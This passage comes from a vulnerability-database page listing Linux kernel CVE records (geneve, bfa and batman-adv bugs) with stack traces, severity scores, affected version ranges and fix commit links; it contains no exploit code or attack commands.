rcu_read_unlock_bh include/linux/rcupdate.h:820 [inline]
__dev_queue_xmit+0x2768/0x51c0 net/core/dev.c:4378
dev_queue_xmit include/linux/netdevice.h:3171 [inline]
packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276
packet_snd net/packet/af_packet.c:3081 [inline]
packet_sendmsg+0x8aef/0x9f10 net/packet/af_packet.c:3113
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
__sys_sendto+0x735/0xa10 net/socket.c:2191
__do_sys_sendto net/socket.c:2203 [inline]
__se_sys_sendto net/socket.c:2199 [inline]
__x64_sys_sendto+0x125/0x1c0 net/socket.c:2199
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Uninit was created at:
slab_post_alloc_hook mm/slub.c:3819 [inline]
slab_alloc_node mm/slub.c:3860 [inline]
kmem_cache_alloc_node+0x5cb/0xbc0 mm/slub.c:3903
kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560
__alloc_skb+0x352/0x790 net/core/skbuff.c:651
alloc_skb include/linux/skbuff.h:1296 [inline]
alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6394
sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2783
packet_alloc_skb net/packet/af_packet.c:2930 [inline]
packet_snd net/packet/af_packet.c:3024 [inline]
packet_sendmsg+0x70c2/0x9f10 net/packet/af_packet.c:3113
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
__sys_sendto+0x735/0xa10 net/socket.c:2191
__do_sys_sendto net/socket.c:2203 [inline]
__se_sys_sendto net/socket.c:2199 [inline]
__x64_sys_sendto+0x125/0x1c0 net/socket.c:2199
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b Version: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b Version: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b Version: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b Version: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b Version: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b Version: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b Version: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26857",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T17:32:22.775976Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T16:53:14.290Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.648Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e431c3227864b5646601c97f5f898d99472f2914"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/59d2a4076983303f324557a114cfd5c32e1f6b29"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c7137900691f5692fe3de54566ea7b30bb35d66c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e77e0b0f2a11735c64b105edaee54d6344faca8a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c0b22568a9d8384fd000cc49acb8f74bde40d1b5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0ece581d2a66e8e488c0d3b3e7b5760dbbfdbdd5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/048e16dee1fc609c1c85072ccd70bfd4b5fef6ca"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1ca1ba465e55b9460e4e75dec9fff31e708fec74"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/geneve.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e431c3227864b5646601c97f5f898d99472f2914",
"status": "affected",
"version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
"versionType": "git"
},
{
"lessThan": "59d2a4076983303f324557a114cfd5c32e1f6b29",
"status": "affected",
"version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
"versionType": "git"
},
{
"lessThan": "c7137900691f5692fe3de54566ea7b30bb35d66c",
"status": "affected",
"version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
"versionType": "git"
},
{
"lessThan": "e77e0b0f2a11735c64b105edaee54d6344faca8a",
"status": "affected",
"version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
"versionType": "git"
},
{
"lessThan": "c0b22568a9d8384fd000cc49acb8f74bde40d1b5",
"status": "affected",
"version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
"versionType": "git"
},
{
"lessThan": "0ece581d2a66e8e488c0d3b3e7b5760dbbfdbdd5",
"status": "affected",
"version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
"versionType": "git"
},
{
"lessThan": "048e16dee1fc609c1c85072ccd70bfd4b5fef6ca",
"status": "affected",
"version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
"versionType": "git"
},
{
"lessThan": "1ca1ba465e55b9460e4e75dec9fff31e708fec74",
"status": "affected",
"version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/geneve.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.310",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.272",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.82",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.22",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.310",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.272",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.82",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.22",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.10",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngeneve: make sure to pull inner header in geneve_rx()\n\nsyzbot triggered a bug in geneve_rx() [1]\n\nIssue is similar to the one I fixed in commit 8d975c15c0cd\n(\"ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()\")\n\nWe have to save skb-\u003enetwork_header in a temporary variable\nin order to be able to recompute the network_header pointer\nafter a pskb_inet_may_pull() call.\n\npskb_inet_may_pull() makes sure the needed headers are in skb-\u003ehead.\n\n[1]\nBUG: KMSAN: uninit-value in IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline]\n BUG: KMSAN: uninit-value in geneve_rx drivers/net/geneve.c:279 [inline]\n BUG: KMSAN: uninit-value in geneve_udp_encap_recv+0x36f9/0x3c10 drivers/net/geneve.c:391\n IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline]\n geneve_rx drivers/net/geneve.c:279 [inline]\n geneve_udp_encap_recv+0x36f9/0x3c10 drivers/net/geneve.c:391\n udp_queue_rcv_one_skb+0x1d39/0x1f20 net/ipv4/udp.c:2108\n udp_queue_rcv_skb+0x6ae/0x6e0 net/ipv4/udp.c:2186\n udp_unicast_rcv_skb+0x184/0x4b0 net/ipv4/udp.c:2346\n __udp4_lib_rcv+0x1c6b/0x3010 net/ipv4/udp.c:2422\n udp_rcv+0x7d/0xa0 net/ipv4/udp.c:2604\n ip_protocol_deliver_rcu+0x264/0x1300 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x2b8/0x440 net/ipv4/ip_input.c:233\n NF_HOOK include/linux/netfilter.h:314 [inline]\n ip_local_deliver+0x21f/0x490 net/ipv4/ip_input.c:254\n dst_input include/net/dst.h:461 [inline]\n ip_rcv_finish net/ipv4/ip_input.c:449 [inline]\n NF_HOOK include/linux/netfilter.h:314 [inline]\n ip_rcv+0x46f/0x760 net/ipv4/ip_input.c:569\n __netif_receive_skb_one_core net/core/dev.c:5534 [inline]\n __netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5648\n process_backlog+0x480/0x8b0 net/core/dev.c:5976\n __napi_poll+0xe3/0x980 net/core/dev.c:6576\n napi_poll net/core/dev.c:6645 [inline]\n net_rx_action+0x8b8/0x1870 net/core/dev.c:6778\n __do_softirq+0x1b7/0x7c5 kernel/softirq.c:553\n do_softirq+0x9a/0xf0 kernel/softirq.c:454\n __local_bh_enable_ip+0x9b/0xa0 kernel/softirq.c:381\n local_bh_enable include/linux/bottom_half.h:33 [inline]\n rcu_read_unlock_bh include/linux/rcupdate.h:820 [inline]\n __dev_queue_xmit+0x2768/0x51c0 net/core/dev.c:4378\n dev_queue_xmit include/linux/netdevice.h:3171 [inline]\n packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276\n packet_snd net/packet/af_packet.c:3081 [inline]\n packet_sendmsg+0x8aef/0x9f10 net/packet/af_packet.c:3113\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n __sys_sendto+0x735/0xa10 net/socket.c:2191\n __do_sys_sendto net/socket.c:2203 [inline]\n __se_sys_sendto net/socket.c:2199 [inline]\n __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\n slab_post_alloc_hook mm/slub.c:3819 [inline]\n slab_alloc_node mm/slub.c:3860 [inline]\n kmem_cache_alloc_node+0x5cb/0xbc0 mm/slub.c:3903\n kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560\n __alloc_skb+0x352/0x790 net/core/skbuff.c:651\n alloc_skb include/linux/skbuff.h:1296 [inline]\n alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6394\n sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2783\n packet_alloc_skb net/packet/af_packet.c:2930 [inline]\n packet_snd net/packet/af_packet.c:3024 [inline]\n packet_sendmsg+0x70c2/0x9f10 net/packet/af_packet.c:3113\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n __sys_sendto+0x735/0xa10 net/socket.c:2191\n __do_sys_sendto net/socket.c:2203 [inline]\n __se_sys_sendto net/socket.c:2199 [inline]\n __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:06.505Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e431c3227864b5646601c97f5f898d99472f2914"
},
{
"url": "https://git.kernel.org/stable/c/59d2a4076983303f324557a114cfd5c32e1f6b29"
},
{
"url": "https://git.kernel.org/stable/c/c7137900691f5692fe3de54566ea7b30bb35d66c"
},
{
"url": "https://git.kernel.org/stable/c/e77e0b0f2a11735c64b105edaee54d6344faca8a"
},
{
"url": "https://git.kernel.org/stable/c/c0b22568a9d8384fd000cc49acb8f74bde40d1b5"
},
{
"url": "https://git.kernel.org/stable/c/0ece581d2a66e8e488c0d3b3e7b5760dbbfdbdd5"
},
{
"url": "https://git.kernel.org/stable/c/048e16dee1fc609c1c85072ccd70bfd4b5fef6ca"
},
{
"url": "https://git.kernel.org/stable/c/1ca1ba465e55b9460e4e75dec9fff31e708fec74"
}
],
"title": "geneve: make sure to pull inner header in geneve_rx()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26857",
"datePublished": "2024-04-17T10:17:19.115Z",
"dateReserved": "2024-02-19T14:20:24.183Z",
"dateUpdated": "2025-05-04T08:58:06.505Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38560 (GCVE-0-2024-38560)
Vulnerability from cvelistv5
Published
2024-06-19 13:35
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: bfa: Ensure the copied buf is NUL terminated
Currently, we allocate a nbytes-sized kernel buffer and copy nbytes from
userspace to that buffer. Later, we use sscanf on this buffer but we don't
ensure that the string is terminated inside the buffer, this can lead to
OOB read when using sscanf. Fix this issue by using memdup_user_nul instead
of memdup_user.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9f30b674759b9a2da25aefe25d885161d8a911cb Version: 9f30b674759b9a2da25aefe25d885161d8a911cb Version: 9f30b674759b9a2da25aefe25d885161d8a911cb Version: 9f30b674759b9a2da25aefe25d885161d8a911cb Version: 9f30b674759b9a2da25aefe25d885161d8a911cb Version: 9f30b674759b9a2da25aefe25d885161d8a911cb Version: 9f30b674759b9a2da25aefe25d885161d8a911cb Version: 9f30b674759b9a2da25aefe25d885161d8a911cb Version: 9f30b674759b9a2da25aefe25d885161d8a911cb |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:28.431Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/481fc0c8617304a67649027c4a44723a139a0462"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/595a6b98deec01b6dbb20139f71edcd5fb760ec2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/00b425ff0891283207d7bad607a2412225274d7a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1708e3cf2488788cba5489e4f913d227de757baf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7d3e694c4fe30f3aba9cd5ae86fb947a54c3db5c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/204714e68015d6946279719fd464ecaf57240f35"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7510fab46b1cbd1680e2a096e779aec3334b4143"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ecb76200f5557a2886888aaa53702da1ab9e6cdf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13d0cecb4626fae67c00c84d3c7851f6b62f7df3"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38560",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:14:37.926935Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:56.869Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/bfa/bfad_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "481fc0c8617304a67649027c4a44723a139a0462",
"status": "affected",
"version": "9f30b674759b9a2da25aefe25d885161d8a911cb",
"versionType": "git"
},
{
"lessThan": "595a6b98deec01b6dbb20139f71edcd5fb760ec2",
"status": "affected",
"version": "9f30b674759b9a2da25aefe25d885161d8a911cb",
"versionType": "git"
},
{
"lessThan": "00b425ff0891283207d7bad607a2412225274d7a",
"status": "affected",
"version": "9f30b674759b9a2da25aefe25d885161d8a911cb",
"versionType": "git"
},
{
"lessThan": "1708e3cf2488788cba5489e4f913d227de757baf",
"status": "affected",
"version": "9f30b674759b9a2da25aefe25d885161d8a911cb",
"versionType": "git"
},
{
"lessThan": "7d3e694c4fe30f3aba9cd5ae86fb947a54c3db5c",
"status": "affected",
"version": "9f30b674759b9a2da25aefe25d885161d8a911cb",
"versionType": "git"
},
{
"lessThan": "204714e68015d6946279719fd464ecaf57240f35",
"status": "affected",
"version": "9f30b674759b9a2da25aefe25d885161d8a911cb",
"versionType": "git"
},
{
"lessThan": "7510fab46b1cbd1680e2a096e779aec3334b4143",
"status": "affected",
"version": "9f30b674759b9a2da25aefe25d885161d8a911cb",
"versionType": "git"
},
{
"lessThan": "ecb76200f5557a2886888aaa53702da1ab9e6cdf",
"status": "affected",
"version": "9f30b674759b9a2da25aefe25d885161d8a911cb",
"versionType": "git"
},
{
"lessThan": "13d0cecb4626fae67c00c84d3c7851f6b62f7df3",
"status": "affected",
"version": "9f30b674759b9a2da25aefe25d885161d8a911cb",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/bfa/bfad_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.19"
},
{
"lessThan": "3.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: bfa: Ensure the copied buf is NUL terminated\n\nCurrently, we allocate a nbytes-sized kernel buffer and copy nbytes from\nuserspace to that buffer. Later, we use sscanf on this buffer but we don\u0027t\nensure that the string is terminated inside the buffer, this can lead to\nOOB read when using sscanf. Fix this issue by using memdup_user_nul instead\nof memdup_user."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:07.087Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/481fc0c8617304a67649027c4a44723a139a0462"
},
{
"url": "https://git.kernel.org/stable/c/595a6b98deec01b6dbb20139f71edcd5fb760ec2"
},
{
"url": "https://git.kernel.org/stable/c/00b425ff0891283207d7bad607a2412225274d7a"
},
{
"url": "https://git.kernel.org/stable/c/1708e3cf2488788cba5489e4f913d227de757baf"
},
{
"url": "https://git.kernel.org/stable/c/7d3e694c4fe30f3aba9cd5ae86fb947a54c3db5c"
},
{
"url": "https://git.kernel.org/stable/c/204714e68015d6946279719fd464ecaf57240f35"
},
{
"url": "https://git.kernel.org/stable/c/7510fab46b1cbd1680e2a096e779aec3334b4143"
},
{
"url": "https://git.kernel.org/stable/c/ecb76200f5557a2886888aaa53702da1ab9e6cdf"
},
{
"url": "https://git.kernel.org/stable/c/13d0cecb4626fae67c00c84d3c7851f6b62f7df3"
}
],
"title": "scsi: bfa: Ensure the copied buf is NUL terminated",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38560",
"datePublished": "2024-06-19T13:35:29.555Z",
"dateReserved": "2024-06-18T19:36:34.922Z",
"dateUpdated": "2025-11-04T17:21:28.431Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35982 (GCVE-0-2024-35982)
Vulnerability from cvelistv5
Published
2024-05-20 09:42
Modified
2025-05-04 09:09
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
batman-adv: Avoid infinite loop trying to resize local TT
If the MTU of one of an attached interface becomes too small to transmit
the local translation table then it must be resized to fit inside all
fragments (when enabled) or a single packet.
But if the MTU becomes too low to transmit even the header + the VLAN
specific part then the resizing of the local TT will never succeed. This
can for example happen when the usable space is 110 bytes and 11 VLANs are
on top of batman-adv. In this case, at least 116 byte would be needed.
There will just be an endless spam of
batman_adv: batadv0: Forced to purge local tt entries to fit new maximum fragment MTU (110)
in the log but the function will never finish. Problem here is that the
timeout will be halved all the time and will then stagnate at 0 and
therefore never be able to reduce the table even more.
There are other scenarios possible with a similar result. The number of
BATADV_TT_CLIENT_NOPURGE entries in the local TT can for example be too
high to fit inside a packet. Such a scenario can therefore happen also with
only a single VLAN + 7 non-purgable addresses - requiring at least 120
bytes.
While this should be handled proactively when:
* interface with too low MTU is added
* VLAN is added
* non-purgeable local mac is added
* MTU of an attached interface is reduced
* fragmentation setting gets disabled (which most likely requires dropping
attached interfaces)
not all of these scenarios can be prevented because batman-adv is only
consuming events without the the possibility to prevent these actions
(non-purgable MAC address added, MTU of an attached interface is reduced).
It is therefore necessary to also make sure that the code is able to handle
also the situations when there were already incompatible system
configuration are present.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a19d3d85e1b854e4a483a55d740a42458085560d Version: a19d3d85e1b854e4a483a55d740a42458085560d Version: a19d3d85e1b854e4a483a55d740a42458085560d Version: a19d3d85e1b854e4a483a55d740a42458085560d Version: a19d3d85e1b854e4a483a55d740a42458085560d Version: a19d3d85e1b854e4a483a55d740a42458085560d Version: a19d3d85e1b854e4a483a55d740a42458085560d Version: a19d3d85e1b854e4a483a55d740a42458085560d |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:3.13:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "3.13"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35982",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T13:42:24.669316Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-835",
"description": "CWE-835 Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
